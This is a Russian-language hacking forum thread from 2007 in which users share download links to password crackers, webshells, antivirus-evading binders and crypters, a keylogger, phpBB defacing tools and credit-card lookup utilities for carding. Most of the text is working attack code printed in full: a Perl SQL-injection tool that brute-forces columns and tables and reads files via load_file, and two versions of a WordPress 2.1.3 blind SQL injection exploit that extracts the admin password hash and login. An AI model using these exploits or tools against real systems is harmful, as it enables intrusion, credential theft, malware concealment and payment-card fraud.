Windows Password Recovery Bootdisk 1.0.0.1
http://www.rixler.com/eng/download/bootdisk.zip

Internet Password Recovery Toolbox 1.3.0.2
http://www.rixler.com/eng/download/iprtbox.zip

Internet Explorer Password Recovery Master 1.4.0.4
http://www.rixler.com/eng/download/iepasrec.zip

Outlook Express Password Recovery Master 1.2.0.4
http://www.rixler.com/eng/download/oepasrec.zip

Dial-up Password Recovery Master 1.3.0.6
http://www.rixler.com/eng/download/dpasrec.zip

FTP Password Recovery Master 1.1.0.1
http://www.rixler.com/download/ftpasrec.zip

Instant Messengers Password Recovery Master 1.0.0.4
http://www.rixler.com/download/impasrec.zip

Email Password Recovery Master 1.1.0.1
http://www.rixler.com/download/empasrec.zip

Opera Password Recovery Master 1.0.0.4
http://www.rixler.com/download/oppasrec.zip

Firefox Password Recovery Master 1.0.0.4
http://www.rixler.com/download/ffpasrec.zip

Office Password Recovery Toolbox 1.0.0.4
http://www.rixler.com/download/oprtbox.zip

Office Multi-document Password Cracker 1.0.0.1
http://www.rixler.com/eng/download/mdpascrk.zip

Word Password Recovery Master 1.0.1.1
http://www.rixler.com/eng/download/wpasrec.zip

Excel Password Recovery Master 1.0.0.8
http://www.rixler.com/eng/download/epasrec.zip

Outlook Password Recovery Master 1.0.0.7
http://www.rixler.com/eng/download/opasrec.zip

Access Password Recovery Master 1.0.0.5
http://www.rixler.com/eng/download/apasrec.zip

VBA Password Recovery Master 1.0.0.3
http://www.rixler.com/eng/download/vbpasrec.zip

Zip Password Recovery Master 6.2.0.0
http://www.rixler.com/download/zipprm.exe

Computer Lock Up 1.0.0.4
http://www.rixler.com/eng/download/complock.zip

Автор: Creeping Death 6.05.2007, 18:45

Genom-mail.ru bruter
http://genom.h10.ru/1111.rar

Автор: Creeping Death 8.05.2007, 23:01

Скрипт для проверки на sql-инъекцию, переборо количества столбцов и имен таблиц по словарю.

#!/usr/bin/perl
#=========================================================================#
use LWP::UserAgent;
use Getopt::Std;
#=========================================================================#

#=========================================================================#
#=MAIN===================================================================#
print "\n AAAAAA OOOOOO H H\n";
print " A A O O H H\n";
print " AAAAAA O O HHHHH\n";
print " A A O O H H\n";
print " A A OOOOOO H H\n\n";
$filt=1; #only chars in resolt
my $www = LWP::UserAgent->new;
uss();
if(!$ARGV[0])
{
ans();
while (true)
{
print "\nNew file (^c for quit) ->";
$f=<STDIN>;
$f =~ s/\n//;
enc(); #encode file
burl();
conn();
getres();
}
}
if ($ARGV[0] eq '-b')
{
print "Url for brute-> "; $u=<STDIN>;
$u =~ s/\n//;
brute();
}
if ($ARGV[0] eq '-t')
{
print "Url for brute-> "; $u=<STDIN>;
$u =~ s/\n//;
brute_table()
}
#=END=MAIN============================================================#
#=======================================================================#

sub brute()
{
$max=40;
$res='';
for ($j=1;$j<$max;$j++)
{
for ($i=1;$i<$j+1;$i++)
{
$utmp.=$i."26639-1,";
}
$utmp = substr($utmp, 0, length ($utmp) - 1 );
$utmp = $u."+UNION+SELECT+".$utmp."/*";
if($coll=chk($utmp))
{
$utmp =~ s\26639-1\\g;
print("[+$j] OK! Coloun number $coll is visible\r\n$utmp");
exit(0);
}
else
{
print("[-$j] falure... ($szz Bytes)\r\n");
}
#print $utmp."\r\n";
$utmp="";
}
}
########################################
sub brute_table()
{
print("--- bruting Colouns ---\r\n");
$max=40;
$res='';
for ($j=1;$j<$max;$j++)
{
for ($i=1;$i<$j+1;$i++)
{
$utmp.=$i."26639-1,";
}
$utmp = substr($utmp, 0, length ($utmp) - 1 );
$utmp = $u."+UNION+SELECT+".$utmp."/*";
if($coll=chk($utmp))
{

print("[+$j] OK! Coloun number $coll is visible\r\n$utmp");
print("\r\n--- bruting Tables ---\r\n");
open(CATFILE, $ARGV[1]);
while($line=readline(CATFILE))
{
chomp($line);
$sql=substr($utmp,0,length($utmp)-2);
$sql.="+FROM+".$line."/*";
if (chk($sql))
{
$sql =~ s\26639-1\\g;
print "[OK] ".$sql."\r\n";
$all_sql.="[OK] ".$sql."\r\n";
}
else
{
print "[-] No table $line\r\n";
}
$sql="";
}
print("\r\n--- Results ---\r\n");
print $all_sql;
exit;
}
else
{
print("[-$j] falure... ($szz Bytes)\r\n");
}
#print $utmp."\r\n";
$utmp="";
}
}
########################################


sub chk()
{
$resp = $www -> get( $_[0] ) or die();
$szz=length($resp->content());
if ($resp->content() =~ /(\d+)26638/) {return($1);}
}

sub ans()

{
exit("bete verion, load_file not correctly working. use -b or -t ");
print "\nAnsver some questions \r\n";
print "Url for union-> "; $u=<STDIN>;
print "Number of coloums -> "; $n=<STDIN>;
print "Coloum with union -> "; $c=<STDIN>;
$u =~ s/\n//;
$f =~ s/\n//;
}

sub enc()
{
for ($i=0;$i<length($f);$i++) {$enc .= ord(substr($f, $i,1 )).',';}
$enc = substr($enc, 0, length ($enc) - 1 );
$f=$enc;
$enc='';
}

sub burl()
{
print "[~] File: $f\n";
$ur = $u; $tmp='';
for ($i=0;$i<$n;$i++)
{
if($i==$c-1)
{
$tmp.="load_file(char($f)),";
}
else
{
$tmp.="0,";
}
}
$tmp = substr($tmp, 0, length ($tmp) - 1 );
$ur.= "+union+select+$tmp/*";
print "[~] url: $ur\n";
}

sub conn ()
{
print "[~] Sending ...\n";
my $resp = $www -> get( $ur );
$cont = $resp -> content();
}

sub getres()
{
$s="_page\">";
$e="</";
$result;
#print $cont;
print "[~] Start: $s \n";
print "[~] End: $e \n";
print "[~] Searching...\n ";
@stringz=split("\n",$cont);
for(@stringz)
{
if(/$e/) { $p = 0; }
$result .= $_."\r\n" if $p;
if(/$s/){ $p = 1; }
}
$result =~ tr/a-zA-Z /a-zA-Z/d;
if($result)
{
print "[+] I found something! \n\n $result";
}
else
{
print "[-] Not found...\n ";
}
$result='';
}



sub uss()
{
print 'AOH SQL INJECTION TOOL By AoH]Slon and AoH]GvOzDiK'."\n";
print '-b for brute colouns'."\n";
print '-t [dictionary_table] for brute tables and colouns'."\n\n";
}

Автор: Creeping Death 9.05.2007, 12:43

GFS-webshell ver 4.0.0.0
Возможности:
1. Удобная навигация по файловой системе жертвы
2. Закачка файлов на сервер жертвы
3. Работа с MySQL
4. Бинд портов и бэкконект
5. Скан портов
6. Брут фтп и MySQL различными способами

http://www.gfs-team.ru/?act=downloads&id=99

FTP-BruteForce ver 1.0

http://www.gfs-team.ru/?act=downloads&id=101

Автор: Creeping Death 9.05.2007, 12:59

Bind.bat , creates a bind shell on port specified

Автор: Creeping Death 10.05.2007, 16:27

Acunetix Web Vulnerability Scanner

Acunetix Web Vulnerability Scanner automatically detects the following vulnerabilities in web applications:
· Cross site scripting
· SQL injection
· CRLF injection
· Code execution
· Directory traversal
· File inclusion
· Script source code disclosure
· Discovers files/directories that may contain sensitive information
· Looks for common files (such as logs, application traces, CVS web repositories), back-up files or directories
· Finds directory listings
· Discovers directories with weak permissions
· Discovers available web server technologies (such as WebDAV, FrontPage, etc.)
· Determines if dangerous HTTP methods are enabled on the web server (e.g. PUT, TRACE, DELETE)
· Inspects the HTTP version banners and looks for vulnerable products
· Tests password strength of applications.
Extend attacks
· With Acunetix Web Vulnerability Scanner, you can construct HTTP/HTTPS requests and analyze the responses using the HTTP editor.
Connection spy
· By enabling you to log, intercept and modify all HTTP/HTTPS traffic, Acunetix Web Vulnerability Scanner gives you an in-depth insight into what data your web application is sending.
Test password strength
· To test the strength of your passwords, you can perform a dictionary attack on basic HTTP, NTLM or form-based authentication.
Test database editor
· Acunetix Web Vulnerability Scanner includes a text database editor that permits you to add additional attacks to the test database (Enterprise & Consultant versions only).
Supports all major web technologies
· Applications utilizing CGI, PHP, ASP, ASP.NET can all be tested for vulnerabilities.
Scanning profiles
· Acunetix Web Vulnerability Scanner allows you to quickly scan sites with different options and identities.
Reporting
· You can save scan sessions to MS SQL Server/Access databases and generate complex reports from previous scan sessions using information stored in the database.


Requirements:

· 128 MB of RAM (256MB or higher recommended)
· 200 MB of available hard-disk space
· Microsoft Internet Explorer 5.1 (or higher)
· Microsoft SQL Server / Access if database is enabled (optional)


Limitations:

· 30 day trial
· The evaluation version is identical to the full version, however you will only be able to scan the Acunetix test websites add you will not be able to save the scan results

http://www.acunetix.com/vulnerability-scanner/wvs_sb_trial_4.exe

Автор: Creeping Death 10.05.2007, 17:29

PacketCreator 1.1
PacketCreator is provided to help network administrators to test their network, by using ARP cache poisoning, and generate ICMP packets to send over the LAN.
The main idea is to allow administrators using these kind of software to secure their network to several known attacks.
This tool can also redirect switched based networks traffic (dumping and forwarding is also provided).
It is possible to create a own made IP packet in which you can edit IP header or every ICMP field.


http://download.softpedia.ro/dl/d2418d478ba628c054d9a6c1406679f3/46432a11/100069721/software/NETWORK/PacketCreator_v1.1_Setup.exe

DoSHTTP 1.0

DoSHTTP is an easy to use and powerful HTTP Flood Denial of Service (DoS) Testing Software for Windows. DoSHTTP includes URL Verification, HTTP Redirection and performance monitoring.
DoSHTTP uses multiple asynchronous sockets to perform an effective HTTP Flood. DoSHTTP can be used simultaneously on multiple clients to emulate a Distributed Denial of Service (DDoS) attack.
DoSHTTP can help IT Professionals test web server performance and evaluate web server protection software. DoSHTTP was developed by certified IT Security and Software Development professionals.
Here are some key features of "DoSHTTP":
· Easy to use and powerful HTTP Flood Denial of Service (DoS) Testing Tool
· Uses multiple asynchronous sockets to perform an effective HTTP Flood
· Allows multiple simultaneous clients to emulate a Distributed Denial of Service (DDoS) Attack
· Supports HTTP Redirection for automatic page redirection (optional)
· Includes URL Verification that displays the response header and document
· Includes Performance Monitoring to track requests issued and responses received
· Allows customized User Agent header fields
· Allows user defined Socket and Request settings
· Supports numeric addressing for Target URLs
· Includes a comprehensive User Guide
Requirements:
· DoSHTTP must be used with an administrative account.
Limitations:
· Free 14-Day Trial


http://www.socketsoft.net/download/doshttp10_setup.exe


Nsauditor Network Security Auditor 1.6
Nsauditor reveals a variety of information, including installed software, users, shares, hotfixes, NetBios, drives, RPC, SQL and SNMP information, open ports.

Nsauditor Network Security Auditor is a network security scanner that allows to audit and monitor remote network computers for possible vulnerabilities, checks your network for all potential methods that a hacker might use to attack it.

Nsauditor is a complete networking utilities package that includes a wide range of tools for network auditing, scanning, monitoring and more.

You can discover network services and check them for vulnerabilities, list all TCP and UDP endpoints with their associated process, discover NetBios names, audit MS SQL servers, scan for common Adware traces and more.

The program also includes real-time network packet filtering and analyzing, remote network performance monitoring, network status monitoring, web proxy scanning, password auditing, intrusion detection system based on security events log analyzer and firewall system that allows to stop internet threats and block unwanted network connections, IP address lookup and more than 45 network tools for scanning, sniffing, enumerating and gaining access to machines, DNS and WHOIS lookups, e-mail validation and HTTP traffic generator.

The product contains a built-in database of known network security vulnerabilities, which allows you to select the items for scanning and add custom entries. Nsauditor can reveal and catalog a variety of information, including installed software, shares, users, drives, hotfixes, NetBios, RPC, SQL and SNMP information, open ports.

Nsauditor Network Security Auditor can also audit password and security policies as well as make a variety of network attack probes, such as stealth port scans, HTTP / CGI server auditing, registry auditing.

Nsauditor Network Security Auditor can sniff and use brute-force and dictionary attacks on LM and NTLM password hashes and expose the insecure ones.

Nsauditor does OS detection and automatically creates OS fingerprints which are not included in database. Reports can be generated in HTML and XML format.

http://www.nsauditor.com/downloads/nsauditor_setup.exe

Автор: Creeping Death 15.05.2007, 16:27

SQL Bruter by Raz0r
http://www.inattack.ru/download.php?id=358

Автор: Creeping Death 15.05.2007, 22:25

Приватный скрипт от Security-Teams.Net Crew для автоматизированного поиска уязвимостей в CGI-скриптах с помощью google. нашелся в паблике.

Автор: Creeping Death 16.05.2007, 08:19

CC2Bank 1.3

Описание: Эта программа поможет вам получить дополнительную информацию о банке сделавшем кредитную карточку.
http://soft.verified.ru/files/databases/cc2bank/cc2bank_1.3/cc2bank13.rar
http://soft.verified.ru/files/databases/cc2bank/cc2bank_1.3/hash.txt

CC2Bank ListGenerator 1.0

Описание: Прога ищет в текстовом фале номера кредитных каточек и подбирая к номеру информацию о банке выводит в список. Потом данные можно сортировать на своё усмотрение и сохранять в отдельный файл.
http://soft.verified.ru/files/databases/cc2bank_listgenerator/cc2bank_listgenerator_1.0/cc2banklg10.rar
http://soft.verified.ru/files/databases/cc2bank_listgenerator/cc2bank_listgenerator_1.0/hash.txt

Mars Banks Base 1.1

Описание: База данных по банкам. Содержит 11 баз: ABA номера банков США, routing номера банков США, БИНы кредитных карт для VISA, MasterCard, American Express, ZIP коды США, занятые телефоны США, регионы SSN, телефонные коды США, штаты США, штаты UK. Поддерживает поиск и фильтрацию, скины...

http://soft.verified.ru/files/databases/mars_banks_base/mars_banks_base_1.1/marsbanksbase11.exe
http://soft.verified.ru/files/databases/mars_banks_base/mars_banks_base_1.1/hash.txt

Zip Express 2.4b

Описание: Zip Express позволяет вам производить поиск по zip, городу, стране или штату.

http://soft.verified.ru/files/databases/zipexpress/zipexpress_2.4/zpex.zip
http://soft.verified.ru/files/databases/zipexpress/zipexpress_2.4/crack.rar
http://soft.verified.ru/files/databases/zipexpress/zipexpress_2.4/hash.txt

Автор: Gener 16.05.2007, 17:14

BE Joiner

Автор: Creeping Death 22.05.2007, 19:37

PRIAMOS - SQL Injector & Scanner
http://rapidshare.com/files/32528869/PRIAMOS.v1.0.zip

Pretator v1.6 - BINDER
http://rapidshare.com/files/32528311/Pretator_v1.6.rar

Redbinder2.0.1
http://rapidshare.com/files/32312064/Redbinder_v_2.0.1.rar

Aase Binder/Packer/Crypter

Language: delphi
Description: bind as many files as you like make them all undetected
run binded files in memory/ extract them to file run hidden/visible
with parameters. server supports many parameters. choose output icon.
save & reload projects.


http://rapidshare.com/files/32263540/aase.rar

AIO - phpBB Tools

Includes:
+ phpBB Annihilator
+ phpBB Defacer
+ UC Forum Spam
+ phpBB Extractor
+ phpBB Spammer
+ phpBB Attacker
+ Bonus: Collection of phpBB exploits

http://rapidshare.com/files/32245240/aio_phpbb2_tools.rar

AntiDote v1.2
antidote 1.2 osce compress and scrambles servers and trojans in order to make them undetected.
http://rapidshare.com/files/32244567/AntiDote_v1.2_osCE.rar

Автор: Creeping Death 22.05.2007, 22:45

avkhack keylogger

Автор: Creeping Death 24.05.2007, 18:06

Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit

<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
//======================================================================

echo "Target: $url
";
echo "sql table prefix: $prefix
";

if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix
";

echo "testing probe delays
";

$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds
";

$hash = get_hash();

add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");

echo "
Work finished
";
echo "Questions and feedback - http://www.waraxe.us/
";
die("See ya!
");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = 'user_pass';
$out = '';

echo "finding hash now ...
";

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch
";
$out .= "$ch";
echo "current value for $field: $out
";
}

echo "
Final result: $field=$out

";

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);

if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]
";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]
";
}

$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo "curr: $curr--$max--$min
";
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;

while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();

if($buff === '-1')
{
break;
}
else
{
echo "test_condition() - try $try - invalid return value ...
";
$try ++;
if($try > $maxtry)
{
die("too many tries - exiting ...
");
}
else
{
echo "trying again - try $try ...
";
}
}
}

$diff = $end - $start;
$delay = intval($diff * 10);

if($delay > ($norm_delay * 2))
{
$bret = true;
}

return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo "$fa
";
$sa = test_md5delay($testcnt);
echo "$sa
";
$fb = test_md5delay(1);
echo "$fb
";
$sb = test_md5delay($testcnt);
echo "$sb
";
$fc = test_md5delay(1);
echo "$fc
";
$sc = test_md5delay($testcnt);
echo "$sc
";

$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs
";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs
";

return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;

// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();

if(intval($buff) !== -1)
{
die("test_md5delay($cnt) - invalid return value, exiting ...");
}

$diff = $end - $start;
$delay = intval($diff * 10);

return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');

if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}

if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}

if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}

$fc = curl_exec($ch);
curl_close($ch);

return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;

$buf .= "
";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
fclose($fh);

}
///////////////////////////////////////////////////////////////////////
?>

<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// original version released - 21. may 2007
// added login retrieving - 23. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
$get_hash = true;// md5 hash retrieving - true or false
$get_login = true;// user login retrieving - true or false
//======================================================================

echo "

WordPress 2.1.3 blind sql injection exploit by waraxe

";
echo "Target: $url
";
echo "sql table prefix: $prefix
";

if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix
";

echo "testing probe delays
";

$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds
";

if($get_hash)
{
echo "trying to get md5 hash from target
";
$hash = get_hash();
}

if($get_login)
{
echo "trying to get user login from target
";
$login = get_login();
}

add_line("Target: $url");
add_line("User ID: $id");
if($get_login)
{
add_line("Login: $login");
}
if($get_hash)
{
add_line("Hash: $hash");
}

echo "
Work finished
";
echo "Questions and feedback - http://www.waraxe.us/
";
die("See ya!
");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_login()
{
$field = 'user_login';
$out = '';

echo "first we need user login length ...
";
$len = get_length($field, 60);
echo "user login length is $len chars
";
echo "finding user login now ...
";

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_anychar($field,$i);
echo "got $field pos $i --> $ch
";
$out .= "$ch";
echo "current value for $field: $out
";
}

echo "
Final result: $field=$out

";

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_length($field, $maxlen = 60)
{
global $prefix, $suffix, $id, $testcnt;
$len = 0;
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH($field)%s,BENCHMARK($cnt,MD5(1337)),3)/*";

$min = 0;
$max = $maxlen;
echo "starting $field length retrieve
";

$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$len = $max;
}
else
{
$len = $min;
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo "curr: $curr--$max--$min
";
}

return $len;

}
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = 'user_pass';
$out = '';

echo "finding hash now ...
";

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch
";
$out .= "$ch";
echo "current value for $field: $out
";
}

echo "
Final result: $field=$out

";

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_anychar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

$min = 32;
$max = 255;
$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo "curr: $curr--$max--$min
";
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);

if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]
";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]
";
}

$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo "curr: $curr--$max--$min
";
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;

while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();

if($buff === '-1')
{
break;
}
else
{
echo "test_condition() - try $try - invalid return value ...
";
$try ++;
if($try > $maxtry)
{
die("too many tries - exiting ...
");
}
else
{
echo "trying again - try $try ...
";
}
}
}

$diff = $end - $start;
$delay = intval($diff * 10);

if($delay > ($norm_delay * 2))
{
$bret = true;
}

return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo "$fa
";
$sa = test_md5delay($testcnt);
echo "$sa
";
$fb = test_md5delay(1);
echo "$fb
";
$sb = test_md5delay($testcnt);
echo "$sb
";
$fc = test_md5delay(1);
echo "$fc
";
$sc = test_md5delay($testcnt);
echo "$sc
";

$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs
";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs
";

return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;

// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();

if(intval($buff) !== -1)
{
die("test_md5delay($cnt) - invalid return value, exiting ...");
}

$diff = $end - $start;
$delay = intval($diff * 10);

return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');

if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}

if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}

if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}

$fc = curl_exec($ch);
curl_close($ch);

return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;

$buf .= "
";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
fclose($fh);

}
///////////////////////////////////////////////////////////////////////
?>

Автор: неузнаваемый 25.05.2007, 00:31

